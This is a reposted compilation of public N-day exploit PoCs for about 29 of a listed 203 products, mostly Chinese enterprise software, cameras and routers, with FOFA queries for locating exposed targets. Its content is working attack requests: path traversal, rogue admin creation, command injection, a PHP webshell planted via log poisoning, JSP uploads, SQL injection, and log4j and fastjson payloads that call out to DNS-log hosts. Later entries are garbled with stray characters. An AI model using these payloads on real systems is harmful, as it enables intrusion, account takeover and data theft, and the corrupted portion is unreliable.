Internet Public Vulnerability Compilation 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Internet Public Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article comes from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities makes up a large share of attack activity in offensive/defensive exercises; we hope this article is of some help to defenders, who can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: every vulnerability listed is public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the back end to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this official account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaboration management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings (cstecgi.cgi getSysStatusCfg) information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. Goanywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform web.php import arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 picture archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder all-media news gathering and editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the function it writes runs a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

0 S& ?" ?4 t) `1 Z( f" |27. 用友 NC showcontent SQL注入
+ Q8 V( L2 l4 Y1 t( _FOFA:icon_hash="1085941792") M) d4 u7 R1 D8 H6 @
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.11 S, x; q% {7 i, }, j
Host: your-ip
* x/ C+ y1 z( w1 V# j, TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 E9 q2 j0 H$ p  a: I) W, SAccept-Encoding: identity
( f: w% d, c) j4 d: tConnection: close
4 ^# S: ?5 `* A% X0 `6 t( y! v; sContent-Type: text/xml; charset=utf-8
& l7 ?5 ], p1 m+ F  J$ U" d
& q+ c3 q, |+ M6 U8 I4 U% Z+ y' Q8 P  O2 _8 d
28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

9 b" w8 U3 x9 T29. 用友NC down/bill SQL注入! d0 B* I& b- x3 E( h! ?
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
  `) g  h8 x" k: MGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. x3 {* C  Q9 K5 J4 y5 _5 V* }, S' wHost: your-ip/ r4 t! b( Q" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 ~5 H8 W# Y( G0 V, {/ ?7 jContent-Type: application/x-www-form-urlencoded
* K! u: A. }+ i* a2 U+ i( o% JAccept-Encoding: gzip, deflate
5 i: l( F' e) Z/ ^( d+ PAccept: */*: J/ k9 `$ N; ~5 o% p
Connection: keep-alive, A2 ~1 f+ G; `$ [3 b3 q: B7 Q/ j
